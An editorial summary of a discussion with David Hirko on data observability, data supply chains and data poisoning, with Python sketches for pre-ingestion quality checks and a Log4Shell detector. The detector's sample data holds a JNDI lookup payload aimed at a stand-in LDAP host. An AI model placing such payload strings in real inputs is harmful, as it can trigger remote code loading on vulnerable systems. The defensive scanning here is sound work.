David Hirko - AI observability and data as a cybersecurity weakness

2022-09-28 · Source: Towards Data Science · Field: Technology & Digital — Artificial Intelligence & Machine Learning, Data Science & Analytics, Cybersecurity & Data Privacy · Depth: Intermediate, extended

Summary

David Hirko, founder of Zectonal, discusses data observability and its role in cybersecurity, particularly for AI and machine learning. He highlights the challenge of ensuring data quality and provenance at scale, noting that many organizations assume their data is legitimate without verifying it. Hirko defines data observability as monitoring quality trends in data at two levels: macro (e.g., timeliness, staleness, volume) and micro (e.g., schema consistency, null values). He introduces the concept of a "data supply chain": data sources need to be tracked from individual sensors through multiple aggregators, akin to a traditional manufacturing supply chain. The discussion also covers data poisoning as a cybersecurity threat. Hirko uses the Log4Shell vulnerability as an example: a malicious payload embedded in a data file can compromise internal systems, in contrast to traditional attacks on internet-facing systems. Zectonal's approach is to inspect data deeply so that issues are detected before the data enters a data lake. Hirko also anticipates that telling real data from synthetic data will become a growing challenge.

Key takeaway

For CTOs and VPs of Data/AI, robust data observability is no longer optional; it is a strategic imperative. Your organization's data supply chain is a significant attack surface, and vulnerabilities can enter through subtle data poisoning or gradual quality degradation. Prioritize tools and processes that enable deep data inspection and pre-ingestion validation, so that compromised data does not reach your AI models and analytics, especially as synthetic data becomes more prevalent.

Key insights

Data observability is crucial for ensuring data quality and security, especially as data becomes a primary attack vector for AI systems.

Principles

Assume data is not inherently trustworthy.
Data quality issues often stem from upstream supply chain anomalies.
Security must be embedded in data observability.

Method

Implement deep data inspection before data is ingested into a data lake, so that poor-quality or malicious data is caught at the boundary. Monitor both macro and micro data trends.
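
As an illustration of what a pre-ingestion check might look like, the sketch below applies two macro checks (staleness, volume) and two micro checks (schema consistency, null rate) to a batch of records. It is a minimal sketch under stated assumptions, not Zectonal's implementation: the Batch type, the inspect_batch function, and all thresholds are hypothetical names and values chosen for this example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass
class Batch:
    """Hypothetical container for one delivery of records from a supplier."""
    rows: list             # list of dicts, one per record
    received_at: datetime  # when the batch arrived


def inspect_batch(batch, expected_columns, now,
                  max_age=timedelta(hours=24), min_rows=1, max_null_rate=0.1):
    """Return a list of issue labels; an empty list means the batch passed.

    expected_columns is a set of column names. All thresholds are
    illustrative defaults, not recommendations.
    """
    issues = []

    # Macro checks: properties of the batch as a whole.
    if now - batch.received_at > max_age:
        issues.append("stale")
    if len(batch.rows) < min_rows:
        issues.append("low_volume")

    # Micro checks: properties of individual records and fields.
    if any(set(row) != expected_columns for row in batch.rows):
        issues.append("schema_mismatch")
    cells = [row.get(col) for row in batch.rows for col in expected_columns]
    if cells and sum(v is None for v in cells) / len(cells) > max_null_rate:
        issues.append("too_many_nulls")

    return issues


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    batch = Batch(rows=[{"id": 1, "temp": None}, {"id": 2}],
                  received_at=now - timedelta(days=3))
    print(inspect_batch(batch, {"id", "temp"}, now))
```

A batch that returns any issue label would be held back for review rather than written to the data lake. In practice the thresholds would be derived from each source's historical trends rather than fixed constants.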

In practice

Scrutinize data provenance from third-party suppliers.
Conduct deep dives on ETL job failures to identify data anomalies.
Exercise caution when using untrusted data sources for projects.
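
One way to exercise that caution is to scan string fields for known malicious patterns before a file from an untrusted source is processed. The sketch below looks for the "${jndi:" lookup prefix associated with Log4Shell payloads. It is a simplified illustration, not the method described in the article: the function name and record layout are hypothetical, and a plain pattern like this will miss obfuscated variants, so it should be read as a starting point rather than a complete defense.

```python
import re

# The "${jndi:" prefix is the lookup syntax abused by Log4Shell payloads.
# Obfuscated variants (nested lookups, encodings) are NOT covered here.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_suspicious_fields(records):
    """Return (record_index, field_name) pairs whose string value matches.

    records is an iterable of dicts; non-string values are skipped.
    """
    hits = []
    for index, record in enumerate(records):
        for field, value in record.items():
            if isinstance(value, str) and JNDI_PATTERN.search(value):
                hits.append((index, field))
    return hits


if __name__ == "__main__":
    sample = [
        {"user_agent": "Mozilla/5.0", "note": "ok"},
        {"user_agent": "${jndi:ldap://example.invalid/a}", "note": None},
    ]
    print(find_suspicious_fields(sample))
```

Any hit would be grounds to quarantine the file and trace it back to its supplier before it is loaded by downstream systems.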

Topics

Data Observability
Data Cybersecurity
Data Supply Chain
Data Poisoning
Synthetic Data

Best for: CTO, VP of Engineering/Data, Director of AI/ML, Data Scientist, Machine Learning Engineer, AI Security Engineer

Editorial summary, takeaway, and curation by AIssential. Original article published by Towards Data Science.